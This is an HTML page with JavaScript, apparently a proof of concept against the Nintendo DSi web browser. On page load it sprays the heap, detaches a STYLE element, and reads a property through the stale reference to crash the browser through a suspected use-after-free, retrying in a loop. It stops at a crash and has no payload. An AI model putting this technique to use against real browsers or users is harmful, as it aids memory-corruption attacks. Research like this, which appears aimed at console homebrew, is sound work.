<html>
<head>
<meta http-equiv="refresh">
</head>
<body>
<h3>Nintendo DSi BrowserHax PoC</h3>
<hr>
<blink>Exploit in progress...</blink>
<div id="sandbox"></div>
<script>
// Shared exploit state. Plain globals, ES3-style (var), because the target
// is the DSi's built-in browser rather than a modern engine.
var spray_str; // Checked by heap_spray()'s if-guard as the cache for the spray string
var cur_tag;   // Tag name of the element under test ("STYLE")
var cur_obj;   // Element under test; the reference is kept after it is detached
var out_div;   // The <div id="sandbox"> that cur_obj is created in
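/* Try to spray the memory with known strings to make fun crashes more visible.
 *
 * Writes ~32 KiB of "A" (8 chars doubled 12 times) bracketed by two random
 * numbers into window.name, then clears it again through eval(). Only the
 * allocation pattern on the DSi browser heap is relied upon. The eval() form
 * is left exactly as the author wrote it rather than replaced by a plain
 * assignment, in case the engine path it takes matters on the target.
 *
 * Fix vs. the original: the spray string was declared with `var` inside the
 * if-block, which shadowed the global spray_str, so the `if (!spray_str)`
 * cache check never fired and the 32 KiB string was rebuilt on every call.
 * The string is now built once and kept in the global spray_str, as the
 * guard intended. If per-call rebuilding turns out to matter for stability
 * on the DSi, this is the place to revert. Kept ES3-style (var, function)
 * because the target is the DSi's browser. No return value.
 */
function heap_spray() {
    if (!spray_str) {
        spray_str = "AAAAAAAA";
        /* TODO: TWEAK for DSi */
        for (var i = 0; i < 12; i++) spray_str += spray_str;
    }
    window.name = Math.random() + spray_str + Math.random();
    eval("window.name=''");
}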
/* Pacing hook between exploit steps.
 *
 * Despite the name this does NOT block: it registers an empty callback to
 * run 100 ms later and returns immediately, so the caller carries on at
 * once. The original author reports it is important for exploit stability
 * (10-100 ms being acceptable), so the setTimeout() call is kept as-is
 * rather than replaced by a real delay; presumably the timer registration
 * itself is the effect that matters on the target. No return value.
 */
function sleep() {
    var noop = function () {};
    setTimeout(noop, 100);
}
/* Log a progress message.
 *
 * Output is disabled in this build: the message is printed nowhere (the
 * console.log call was commented out by the author). The only side effect
 * is the sleep() pacing call, which is why log() is sprinkled between the
 * DOM operations in dsihax().
 *
 * For remote tracing the author's disabled variant fired a synchronous GET
 * at debug.php?state=...&message=... (kept below, commented out). If you
 * re-enable it, keep the encodeURIComponent() call: the messages contain
 * '<', '>' and raw exception text, and the URL is built by concatenation.
 *
 * @param {string} message - human-readable progress text (currently unused)
 */
function log(message) {
    sleep();
    /*
    var stateTemp = "NaN";
    var request = new XMLHttpRequest();
    request.open("GET", "debug.php?state=" + stateTemp + "&message=" + encodeURIComponent(message), false);
    request.send();
    */
}
/* Main browserhax function: one attempt at triggering the suspected
 * use-after-free in the DSi browser's DOM.
 *
 * It is driven repeatedly from the setInterval() loop at the bottom of the
 * script, so it has to cope with stale state left by the previous attempt
 * (hence the guarded removeChild() in phase 0). Works on the globals
 * cur_obj, out_div and cur_tag and calls heap_spray() and log().
 *
 * Phases:
 *   0. Detach the previous attempt's element, create a fresh <STYLE> inside
 *      the sandbox div and populate it.
 *   1. Spray, detach the element via removeChild(), spray again. cur_obj
 *      still holds the JS reference to the now-detached node.
 *   2. Read cur_obj.disabled through that stale reference. Per the author's
 *      notes this is where the DSi crashes or returns inconsistent values,
 *      which is what points at a use-after-free.
 *
 * No return value. Any exception escapes to the caller, which reloads the
 * page to start over. The statement order (especially the heap_spray()
 * calls around the removeChild()) is the exploit itself; do not reorder.
 */
function dsihax() {
    /*********************************************/
    /* PHASE 0: Create new HTML tag in a sandbox */
    /*********************************************/
    log('+++ Phase 0: initialization +++');
    /* On the very first call cur_obj is still undefined and removeChild()
     * throws; that is expected and only logged. */
    try {
        out_div.removeChild(cur_obj);
        log('Previous object removed OK.');
    } catch (e) {
        log('Failed to remove previously used object.');
    }
    cur_tag = "STYLE";
    log('Picked target tag: <' + cur_tag + '>');
    cur_obj = document.createElement(cur_tag);
    out_div.appendChild(cur_obj);
    cur_obj.innerHTML = 'Hello world';
    log('Populated object with sample HTML.');
    /* <style> has no native value attribute, so this presumably just adds an
     * expando property on the element's JS wrapper -- TODO confirm whether it
     * matters on the DSi engine. */
    cur_obj.value = 'Hello world';
    log('Populated object with sample value.');
    log('+++ Phase 1: discarding object +++');
    heap_spray();
    log('Trying to delete child node via DOM...');
    try {
        out_div.removeChild(cur_obj);
        log('...success.');
    } catch (e) {
        log('...received exception (' + e + ')');
    }
    heap_spray();
    /* cur_obj was assigned from createElement() above, so this guard only
     * skips phase 2 if that call returned a falsy value. */
    if (cur_obj) {
        log('+++ Phase 2: read objects "disabled" property value +++');
        log('+++ This should crash the DSi. Retry when not... +++');
        /* Read the disabled property through the stale reference. Author's
         * observation: this crashes the DSi, or sometimes returns an
         * arbitrary true/false -- suspected use-after-free. */
        var checkProp = cur_obj.disabled;
        log('+++ property value is: ' + checkProp + ' +++');
    }
}
/* Entry point (runs at page load): prime the heap once, empty the sandbox
 * div that dsihax() builds its element in, then retry dsihax() on a 1 ms
 * interval. An exception inside dsihax() reloads the page so the next
 * attempt starts from a fresh document; a browser crash is the "success"
 * condition for this PoC. The interval body is kept in its string form and
 * the statement order unchanged -- this is the exploit's timing loop. */
heap_spray();
out_div = document.getElementById('sandbox');
out_div.innerHTML = '';
// Silent retry until it works: any exception reloads and starts over.
setInterval('try { dsihax() } catch (e) { location.reload(); }',1);
</script>